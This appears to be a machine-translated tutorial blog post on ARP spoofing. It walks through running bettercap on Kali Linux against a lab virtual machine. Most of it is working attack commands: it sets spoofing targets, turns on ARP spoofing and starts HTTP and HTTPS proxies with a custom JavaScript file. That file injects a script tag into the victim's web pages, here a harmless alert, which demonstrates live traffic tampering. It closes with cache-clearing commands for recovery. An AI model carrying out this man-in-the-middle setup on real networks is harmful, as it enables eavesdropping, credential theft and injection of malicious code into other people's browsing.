Disclaimer: This article is only for study, research and discussion, and you must not do illegal and disciplined things!
Hello everyone, let’s talk about arp deception today
When two devices communicate within a LAN, they use the ARP protocol to determine each other’s physical address (MAC address). ARP spoofing is a network attack technique that exploits the working principle of the ARP protocol to deceive other devices.
Imagine you are chatting with your friends over a shared network. Your computers all have unique IP addresses and MAC addresses. When you want to send a message to your friend, your computer sends a broadcast request asking who has the MAC address corresponding to your friend’s IP address. Your friend’s computer will receive this request and reply back to your computer, telling you what its MAC address is.
In an ARP spoofing attack, the attacker sends a false response claiming to have the MAC address corresponding to an IP address. That way, when you send a message to your friend, your computer will mistake the attacker’s computer for your friend’s computer and send the message to the attacker. Attackers can eavesdrop, modify, or intercept your communications without your knowledge.
In other words, ARP spoofing is like someone pretending to be your friend, standing between you and your friend, eavesdropping and tampering with the conversation between you. This allows attackers to obtain your sensitive information, login credentials, or perform other malicious actions against you.
The tool used here is called bettercap, which comes with kali. (The target machine is preferably a virtual machine, it is best not to interview on a physical machine, otherwise the network connectivity may be a bit problematic)
The first step is to determine the ip of the target machine
ipconfig
The ip address is 192.168.x.xx
We enter arp -a
view arp list
- Interface: Display the network interface to which the ARP table belongs, where “192.168.xx.x” is the IP address of the interface.
- Internet Address: Displays the known IP addresses of other devices.
- Physical Address: Displays the MAC address corresponding to each IP address, which is used to uniquely identify the physical address of the device.
- Type: Indicates the relationship between the IP address and the MAC address. There are two types in this ARP table: dynamic (Dynamic) and static (Static).
Next we start bettercap with kali
The first time you start it, it will show that you want to install this tool
Then enter bettercap to start
like this
Set the spoofed address We started with the target machine address of ipconfig
1. Set the ip address to be spoofed, if not set, the default is the global ip
set arp.spoof.targets 192.168.xx.xxx
2. Start cheating
arp. spoof on
It shows that arp.spoof cannot find the spoofing target
what’s going on
It’s because our target drone is a wireless network
The attacking machine is a nat network
In this case, the arp.spoof command may not be used directly. The reason is that the NAT network usually provides network address translation for the devices connected to it, and the attacker cannot directly send a forged ARP response to the Wi-Fi network.
So we set the attack machine Kali as a bridged network, we have configured it before and can switch directly
Here we ifconfig
What are these things?
Creating multiple container environments using Docker in Kali will cause you to see many network interfaces, this is normal behavior. Each Docker container creates its own network namespace and is assigned a virtual network interface. Therefore, when starting multiple Docker containers, you will see many newly added network interfaces.
Here are some commands to deal with these network interfaces
Run the following command to get the name of the Docker virtual bridge interface:
docker network ls --filter driver=bridge --format '{{.ID}}: {{.Name}}' | awk -F': ' '{print $2}'
will list and delete all Docker virtual bridge interfaces
docker network prune --force
Then I ifconfig look
over
When you switch bridged networks
Remember to replace the nat network with a bridged network
Then repeat the arp spoof command
deception succeeded
Let’s take a look at arp -a
The first is the mac address of the gateway and the fourth is my kalimac address. These two are the same. After arp spoofing, the mac address of the gateway is the mac address of our attacking machine
can be cheated
Now we can write a script for any file directory. I wrote 1.js in /home/yan8925298
function onResponse(req,res){
if(res.ContentType.indexOf('text/html')==0){
var body = res. ReadBody();
if(body. indexOf('</head>')!=-1){
res.Body=body.replace(
'</head>',
'<script type="text/javascript">alert("your computer has hacked!")</script></head>'
);
}
}
}
- Start bettercap
-
set arp.spoof.targets 192.168.x.x,192.168.x.xxx#Set the target of arp spoofing, here is the gateway and the target machine
set http.proxy.script /home/yan8925298/1.js #Inject script into http traffic
set https.proxy.script /home/yan8925298/1.js #Inject script into https traffic
http.proxy on #Open HTTP proxy
https.proxy on #Open HTTPS proxy
arp.spoof on #Open ARP spoofing
-
It will start a port 8080 if it runs normally without reporting an error. If this port is occupied, it will exit directly after you run the command, so make sure that port 8080 is not occupied.
-
This is the rendering
Clearing the ARP cache can help restore normal network operation after an ARP spoofing attack. (target drone)
windows:arp -d
linux: sudo ip neigh flush all